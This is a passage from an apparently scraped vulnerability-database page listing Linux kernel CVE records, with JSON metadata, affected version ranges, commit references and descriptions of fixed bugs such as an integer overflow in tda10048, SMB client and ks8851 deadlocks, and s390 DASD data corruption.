                  "versionEndExcluding": "6.9.9",
                  "versionStartIncluding": "2.6.31",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "2.6.31",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: dvb-frontends: tda10048: Fix integer overflow\n\nstate-\u003extal_hz can be up to 16M, so it can overflow a 32 bit integer\nwhen multiplied by pll_mfactor.\n\nCreate a new 64 bit variable to hold the calculations."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-21T09:13:03.803Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/8167e4d7dc086d4f7ca7897dcff3827e4d22c99a"
        },
        {
          "url": "https://git.kernel.org/stable/c/5c72587d024f087aecec0221eaff2fe850d856ce"
        },
        {
          "url": "https://git.kernel.org/stable/c/e1ba22618758e95e09c9fd30c69ccce38edf94c0"
        },
        {
          "url": "https://git.kernel.org/stable/c/bd5620439959a7e02012588c724c6ff5143b80af"
        },
        {
          "url": "https://git.kernel.org/stable/c/1663e2474e4d777187d749a5c90ae83232db32bd"
        },
        {
          "url": "https://git.kernel.org/stable/c/8ac224e9371dc3c4eb666033e6b42d05cf5184a1"
        },
        {
          "url": "https://git.kernel.org/stable/c/1121d8a5c6ed6b8fad492e43b63b386cb6a3a9d8"
        },
        {
          "url": "https://git.kernel.org/stable/c/1aa1329a67cc214c3b7bd2a14d1301a795760b07"
        }
      ],
      "title": "media: dvb-frontends: tda10048: Fix integer overflow",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42223",
    "datePublished": "2024-07-30T07:47:04.861Z",
    "dateReserved": "2024-07-30T07:40:12.249Z",
    "dateUpdated": "2025-11-03T22:02:25.947Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2023-52757 (GCVE-0-2023-52757)

Vulnerability from cvelistv5 – Published: 2024-05-21 15:30 – Updated: 2026-01-05 10:17

Title

smb: client: fix potential deadlock when releasing mids

Summary

In the Linux kernel, the following vulnerability has been resolved: smb: client: fix potential deadlock when releasing mids All release_mid() callers seem to hold a reference of @mid so there is no need to call kref_put(&mid->refcount, __release_mid) under @server->mid_lock spinlock. If they don't, then an use-after-free bug would have occurred anyways. By getting rid of such spinlock also fixes a potential deadlock as shown below CPU 0 CPU 1 ------------------------------------------------------------------ cifs_demultiplex_thread() cifs_debug_data_proc_show() release_mid() spin_lock(&server->mid_lock); spin_lock(&cifs_tcp_ses_lock) spin_lock(&server->mid_lock) __release_mid() smb2_find_smb_tcon() spin_lock(&cifs_tcp_ses_lock) *deadlock*

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/99f476e27aad5964a…
	https://git.kernel.org/stable/c/ce49569079a9d4cad…
	https://git.kernel.org/stable/c/9eb44db68c5b7f5aa…
	https://git.kernel.org/stable/c/b9bb9607b1fc12fca…
	https://git.kernel.org/stable/c/c1a5962f1462b64fe…
	https://git.kernel.org/stable/c/e6322fd177c6885a2…

Impacted products

Vendor

Product

Version

Linux

Affected: 7b71843fa7028475b052107664cbe120156a2cfc , < 99f476e27aad5964ab13777d84fda67d1356dec1 (git)
Affected: 7b71843fa7028475b052107664cbe120156a2cfc , < ce49569079a9d4cad26c0f1d4653382fd9a5ca7a (git)
Affected: 7b71843fa7028475b052107664cbe120156a2cfc , < 9eb44db68c5b7f5aa22b8fc7de74a3e2e08d1f29 (git)
Affected: 7b71843fa7028475b052107664cbe120156a2cfc , < b9bb9607b1fc12fca51f5632da25b36975f599bf (git)
Affected: 7b71843fa7028475b052107664cbe120156a2cfc , < c1a5962f1462b64fe7b69f20a4b6af8067bc2d26 (git)
Affected: 7b71843fa7028475b052107664cbe120156a2cfc , < e6322fd177c6885a21dd4609dc5e5c973d1a2eb7 (git)
Affected: 9871dea42034ee6e73bb2b97ba0284d3d462b230 (git)

Linux

Affected: 5.5
Unaffected: 0 , < 5.5 (semver)
Unaffected: 5.10.237 , ≤ 5.10.* (semver)
Unaffected: 5.15.181 , ≤ 5.15.* (semver)
Unaffected: 6.1.64 , ≤ 6.1.* (semver)
Unaffected: 6.5.13 , ≤ 6.5.* (semver)
Unaffected: 6.6.3 , ≤ 6.6.* (semver)
Unaffected: 6.7 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T19:28:49.329Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9eb44db68c5b7f5aa22b8fc7de74a3e2e08d1f29"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b9bb9607b1fc12fca51f5632da25b36975f599bf"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c1a5962f1462b64fe7b69f20a4b6af8067bc2d26"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e6322fd177c6885a21dd4609dc5e5c973d1a2eb7"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/05/msg00030.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2023-52757",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:37:12.677779Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:56.199Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/smb/client/cifsproto.h",
            "fs/smb/client/smb2misc.c",
            "fs/smb/client/transport.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "99f476e27aad5964ab13777d84fda67d1356dec1",
              "status": "affected",
              "version": "7b71843fa7028475b052107664cbe120156a2cfc",
              "versionType": "git"
            },
            {
              "lessThan": "ce49569079a9d4cad26c0f1d4653382fd9a5ca7a",
              "status": "affected",
              "version": "7b71843fa7028475b052107664cbe120156a2cfc",
              "versionType": "git"
            },
            {
              "lessThan": "9eb44db68c5b7f5aa22b8fc7de74a3e2e08d1f29",
              "status": "affected",
              "version": "7b71843fa7028475b052107664cbe120156a2cfc",
              "versionType": "git"
            },
            {
              "lessThan": "b9bb9607b1fc12fca51f5632da25b36975f599bf",
              "status": "affected",
              "version": "7b71843fa7028475b052107664cbe120156a2cfc",
              "versionType": "git"
            },
            {
              "lessThan": "c1a5962f1462b64fe7b69f20a4b6af8067bc2d26",
              "status": "affected",
              "version": "7b71843fa7028475b052107664cbe120156a2cfc",
              "versionType": "git"
            },
            {
              "lessThan": "e6322fd177c6885a21dd4609dc5e5c973d1a2eb7",
              "status": "affected",
              "version": "7b71843fa7028475b052107664cbe120156a2cfc",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "9871dea42034ee6e73bb2b97ba0284d3d462b230",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/smb/client/cifsproto.h",
            "fs/smb/client/smb2misc.c",
            "fs/smb/client/transport.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.5"
            },
            {
              "lessThan": "5.5",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.237",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.181",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.64",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.5.*",
              "status": "unaffected",
              "version": "6.5.13",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.7",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.237",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.181",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.64",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.5.13",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.3",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.4.6",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix potential deadlock when releasing mids\n\nAll release_mid() callers seem to hold a reference of @mid so there is\nno need to call kref_put(\u0026mid-\u003erefcount, __release_mid) under\n@server-\u003emid_lock spinlock.  If they don\u0027t, then an use-after-free bug\nwould have occurred anyways.\n\nBy getting rid of such spinlock also fixes a potential deadlock as\nshown below\n\nCPU 0                                CPU 1\n------------------------------------------------------------------\ncifs_demultiplex_thread()            cifs_debug_data_proc_show()\n release_mid()\n  spin_lock(\u0026server-\u003emid_lock);\n                                     spin_lock(\u0026cifs_tcp_ses_lock)\n\t\t\t\t      spin_lock(\u0026server-\u003emid_lock)\n  __release_mid()\n   smb2_find_smb_tcon()\n    spin_lock(\u0026cifs_tcp_ses_lock) *deadlock*"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:17:11.299Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/99f476e27aad5964ab13777d84fda67d1356dec1"
        },
        {
          "url": "https://git.kernel.org/stable/c/ce49569079a9d4cad26c0f1d4653382fd9a5ca7a"
        },
        {
          "url": "https://git.kernel.org/stable/c/9eb44db68c5b7f5aa22b8fc7de74a3e2e08d1f29"
        },
        {
          "url": "https://git.kernel.org/stable/c/b9bb9607b1fc12fca51f5632da25b36975f599bf"
        },
        {
          "url": "https://git.kernel.org/stable/c/c1a5962f1462b64fe7b69f20a4b6af8067bc2d26"
        },
        {
          "url": "https://git.kernel.org/stable/c/e6322fd177c6885a21dd4609dc5e5c973d1a2eb7"
        }
      ],
      "title": "smb: client: fix potential deadlock when releasing mids",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2023-52757",
    "datePublished": "2024-05-21T15:30:44.248Z",
    "dateReserved": "2024-05-21T15:19:24.237Z",
    "dateUpdated": "2026-01-05T10:17:11.299Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-41036 (GCVE-0-2024-41036)

Vulnerability from cvelistv5 – Published: 2024-07-29 14:31 – Updated: 2025-11-03 21:59

Title

net: ks8851: Fix deadlock with the SPI chip variant

Summary

In the Linux kernel, the following vulnerability has been resolved: net: ks8851: Fix deadlock with the SPI chip variant When SMP is enabled and spinlocks are actually functional then there is a deadlock with the 'statelock' spinlock between ks8851_start_xmit_spi and ks8851_irq: watchdog: BUG: soft lockup - CPU#0 stuck for 27s! call trace: queued_spin_lock_slowpath+0x100/0x284 do_raw_spin_lock+0x34/0x44 ks8851_start_xmit_spi+0x30/0xb8 ks8851_start_xmit+0x14/0x20 netdev_start_xmit+0x40/0x6c dev_hard_start_xmit+0x6c/0xbc sch_direct_xmit+0xa4/0x22c __qdisc_run+0x138/0x3fc qdisc_run+0x24/0x3c net_tx_action+0xf8/0x130 handle_softirqs+0x1ac/0x1f0 __do_softirq+0x14/0x20 ____do_softirq+0x10/0x1c call_on_irq_stack+0x3c/0x58 do_softirq_own_stack+0x1c/0x28 __irq_exit_rcu+0x54/0x9c irq_exit_rcu+0x10/0x1c el1_interrupt+0x38/0x50 el1h_64_irq_handler+0x18/0x24 el1h_64_irq+0x64/0x68 __netif_schedule+0x6c/0x80 netif_tx_wake_queue+0x38/0x48 ks8851_irq+0xb8/0x2c8 irq_thread_fn+0x2c/0x74 irq_thread+0x10c/0x1b0 kthread+0xc8/0xd8 ret_from_fork+0x10/0x20 This issue has not been identified earlier because tests were done on a device with SMP disabled and so spinlocks were actually NOPs. Now use spin_(un)lock_bh for TX queue related locking to avoid execution of softirq work synchronously that would lead to a deadlock.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/a0c69c492f4a8fad5…
	https://git.kernel.org/stable/c/80ece00137300d746…
	https://git.kernel.org/stable/c/10fec0cd0e8f56ff0…
	https://git.kernel.org/stable/c/0913ec336a6c0c4a2…

Impacted products

Vendor

Product

Version

Linux

Affected: 1092525155eaad5c69ca9f3b6f3e7895a9424d66 , < a0c69c492f4a8fad52f0a97565241c926160c9a4 (git)
Affected: 30302b41ffdcd194bef27fb3b1a9f2ca53dedb27 , < 80ece00137300d74642f2038c8fe5440deaf9f05 (git)
Affected: 3dc5d44545453de1de9c53cc529cc960a85933da , < 10fec0cd0e8f56ff06c46bb24254c7d8f8f2bbf0 (git)
Affected: 3dc5d44545453de1de9c53cc529cc960a85933da , < 0913ec336a6c0c4a2b296bd9f74f8e41c4c83c8c (git)
Affected: 786788bb1396ed5ea27e39c4933f59f4e52004e4 (git)
Affected: 7c25c5d7274631b655f0f9098a16241fcd5db57b (git)

Linux

Affected: 6.7
Unaffected: 0 , < 6.7 (semver)
Unaffected: 6.1.100 , ≤ 6.1.* (semver)
Unaffected: 6.6.41 , ≤ 6.6.* (semver)
Unaffected: 6.9.10 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:59:33.670Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a0c69c492f4a8fad52f0a97565241c926160c9a4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/80ece00137300d74642f2038c8fe5440deaf9f05"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/10fec0cd0e8f56ff06c46bb24254c7d8f8f2bbf0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0913ec336a6c0c4a2b296bd9f74f8e41c4c83c8c"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-41036",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:23:30.114712Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:03.463Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/micrel/ks8851_common.c",
            "drivers/net/ethernet/micrel/ks8851_spi.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "a0c69c492f4a8fad52f0a97565241c926160c9a4",
              "status": "affected",
              "version": "1092525155eaad5c69ca9f3b6f3e7895a9424d66",
              "versionType": "git"
            },
            {
              "lessThan": "80ece00137300d74642f2038c8fe5440deaf9f05",
              "status": "affected",
              "version": "30302b41ffdcd194bef27fb3b1a9f2ca53dedb27",
              "versionType": "git"
            },
            {
              "lessThan": "10fec0cd0e8f56ff06c46bb24254c7d8f8f2bbf0",
              "status": "affected",
              "version": "3dc5d44545453de1de9c53cc529cc960a85933da",
              "versionType": "git"
            },
            {
              "lessThan": "0913ec336a6c0c4a2b296bd9f74f8e41c4c83c8c",
              "status": "affected",
              "version": "3dc5d44545453de1de9c53cc529cc960a85933da",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "786788bb1396ed5ea27e39c4933f59f4e52004e4",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "7c25c5d7274631b655f0f9098a16241fcd5db57b",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/micrel/ks8851_common.c",
            "drivers/net/ethernet/micrel/ks8851_spi.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.7"
            },
            {
              "lessThan": "6.7",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.100",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.41",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.100",
                  "versionStartIncluding": "6.1.70",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.41",
                  "versionStartIncluding": "6.6.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.10",
                  "versionStartIncluding": "6.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.10.206",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.15.146",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: ks8851: Fix deadlock with the SPI chip variant\n\nWhen SMP is enabled and spinlocks are actually functional then there is\na deadlock with the \u0027statelock\u0027 spinlock between ks8851_start_xmit_spi\nand ks8851_irq:\n\n    watchdog: BUG: soft lockup - CPU#0 stuck for 27s!\n    call trace:\n      queued_spin_lock_slowpath+0x100/0x284\n      do_raw_spin_lock+0x34/0x44\n      ks8851_start_xmit_spi+0x30/0xb8\n      ks8851_start_xmit+0x14/0x20\n      netdev_start_xmit+0x40/0x6c\n      dev_hard_start_xmit+0x6c/0xbc\n      sch_direct_xmit+0xa4/0x22c\n      __qdisc_run+0x138/0x3fc\n      qdisc_run+0x24/0x3c\n      net_tx_action+0xf8/0x130\n      handle_softirqs+0x1ac/0x1f0\n      __do_softirq+0x14/0x20\n      ____do_softirq+0x10/0x1c\n      call_on_irq_stack+0x3c/0x58\n      do_softirq_own_stack+0x1c/0x28\n      __irq_exit_rcu+0x54/0x9c\n      irq_exit_rcu+0x10/0x1c\n      el1_interrupt+0x38/0x50\n      el1h_64_irq_handler+0x18/0x24\n      el1h_64_irq+0x64/0x68\n      __netif_schedule+0x6c/0x80\n      netif_tx_wake_queue+0x38/0x48\n      ks8851_irq+0xb8/0x2c8\n      irq_thread_fn+0x2c/0x74\n      irq_thread+0x10c/0x1b0\n      kthread+0xc8/0xd8\n      ret_from_fork+0x10/0x20\n\nThis issue has not been identified earlier because tests were done on\na device with SMP disabled and so spinlocks were actually NOPs.\n\nNow use spin_(un)lock_bh for TX queue related locking to avoid execution\nof softirq work synchronously that would lead to a deadlock."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:57:28.471Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/a0c69c492f4a8fad52f0a97565241c926160c9a4"
        },
        {
          "url": "https://git.kernel.org/stable/c/80ece00137300d74642f2038c8fe5440deaf9f05"
        },
        {
          "url": "https://git.kernel.org/stable/c/10fec0cd0e8f56ff06c46bb24254c7d8f8f2bbf0"
        },
        {
          "url": "https://git.kernel.org/stable/c/0913ec336a6c0c4a2b296bd9f74f8e41c4c83c8c"
        }
      ],
      "title": "net: ks8851: Fix deadlock with the SPI chip variant",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-41036",
    "datePublished": "2024-07-29T14:31:50.669Z",
    "dateReserved": "2024-07-12T12:17:45.620Z",
    "dateUpdated": "2025-11-03T21:59:33.670Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-45026 (GCVE-0-2024-45026)

Vulnerability from cvelistv5 – Published: 2024-09-11 15:13 – Updated: 2025-11-03 22:15

Title

s390/dasd: fix error recovery leading to data corruption on ESE devices

Summary

In the Linux kernel, the following vulnerability has been resolved: s390/dasd: fix error recovery leading to data corruption on ESE devices Extent Space Efficient (ESE) or thin provisioned volumes need to be formatted on demand during usual IO processing. The dasd_ese_needs_format function checks for error codes that signal the non existence of a proper track format. The check for incorrect length is to imprecise since other error cases leading to transport of insufficient data also have this flag set. This might lead to data corruption in certain error cases for example during a storage server warmstart. Fix by removing the check for incorrect length and replacing by explicitly checking for invalid track format in transport mode. Also remove the check for file protected since this is not a valid ESE handling case.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/19f60a55b2fda49bc…
	https://git.kernel.org/stable/c/e245a18281c252c8d…
	https://git.kernel.org/stable/c/a665e3b7ac7d5cdc2…
	https://git.kernel.org/stable/c/0a228896a1b3654cd…
	https://git.kernel.org/stable/c/93a7e2856951680cd…
	https://git.kernel.org/stable/c/5d4a304338daf83ac…
	https://git.kernel.org/stable/c/7db4042336580dfd7…

Impacted products

Vendor

Product

Version

Linux

Affected: 5e2b17e712cf10cc3cc98fde28a88e8f1a1267e9 , < 19f60a55b2fda49bc4f6134a5f6356ef62ee69d8 (git)
Affected: 5e2b17e712cf10cc3cc98fde28a88e8f1a1267e9 , < e245a18281c252c8dbc467492e09bb5d4b012118 (git)
Affected: 5e2b17e712cf10cc3cc98fde28a88e8f1a1267e9 , < a665e3b7ac7d5cdc26e00e3d0fc8fd490e00316a (git)
Affected: 5e2b17e712cf10cc3cc98fde28a88e8f1a1267e9 , < 0a228896a1b3654cd461ff654f6a64e97a9c3246 (git)
Affected: 5e2b17e712cf10cc3cc98fde28a88e8f1a1267e9 , < 93a7e2856951680cd7fe6ebd705ac10c8a8a5efd (git)
Affected: 5e2b17e712cf10cc3cc98fde28a88e8f1a1267e9 , < 5d4a304338daf83ace2887aaacafd66fe99ed5cc (git)
Affected: 5e2b17e712cf10cc3cc98fde28a88e8f1a1267e9 , < 7db4042336580dfd75cb5faa82c12cd51098c90b (git)

Linux

Affected: 5.3
Unaffected: 0 , < 5.3 (semver)
Unaffected: 5.4.283 , ≤ 5.4.* (semver)
Unaffected: 5.10.225 , ≤ 5.10.* (semver)
Unaffected: 5.15.166 , ≤ 5.15.* (semver)
Unaffected: 6.1.107 , ≤ 6.1.* (semver)
Unaffected: 6.6.48 , ≤ 6.6.* (semver)
Unaffected: 6.10.7 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-45026",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-29T15:46:39.841573Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-29T15:46:54.052Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:15:37.529Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/s390/block/dasd.c",
            "drivers/s390/block/dasd_3990_erp.c",
            "drivers/s390/block/dasd_eckd.c",
            "drivers/s390/block/dasd_int.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "19f60a55b2fda49bc4f6134a5f6356ef62ee69d8",
              "status": "affected",
              "version": "5e2b17e712cf10cc3cc98fde28a88e8f1a1267e9",
              "versionType": "git"
            },
            {
              "lessThan": "e245a18281c252c8dbc467492e09bb5d4b012118",
              "status": "affected",
              "version": "5e2b17e712cf10cc3cc98fde28a88e8f1a1267e9",
              "versionType": "git"
            },
            {
              "lessThan": "a665e3b7ac7d5cdc26e00e3d0fc8fd490e00316a",
              "status": "affected",
              "version": "5e2b17e712cf10cc3cc98fde28a88e8f1a1267e9",
              "versionType": "git"
            },
            {
              "lessThan": "0a228896a1b3654cd461ff654f6a64e97a9c3246",
              "status": "affected",
              "version": "5e2b17e712cf10cc3cc98fde28a88e8f1a1267e9",
              "versionType": "git"
            },
            {
              "lessThan": "93a7e2856951680cd7fe6ebd705ac10c8a8a5efd",
              "status": "affected",
              "version": "5e2b17e712cf10cc3cc98fde28a88e8f1a1267e9",
              "versionType": "git"
            },
            {
              "lessThan": "5d4a304338daf83ace2887aaacafd66fe99ed5cc",
              "status": "affected",
              "version": "5e2b17e712cf10cc3cc98fde28a88e8f1a1267e9",
              "versionType": "git"
            },
            {
              "lessThan": "7db4042336580dfd75cb5faa82c12cd51098c90b",
              "status": "affected",
              "version": "5e2b17e712cf10cc3cc98fde28a88e8f1a1267e9",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/s390/block/dasd.c",
            "drivers/s390/block/dasd_3990_erp.c",
            "drivers/s390/block/dasd_eckd.c",
            "drivers/s390/block/dasd_int.h"
          ],
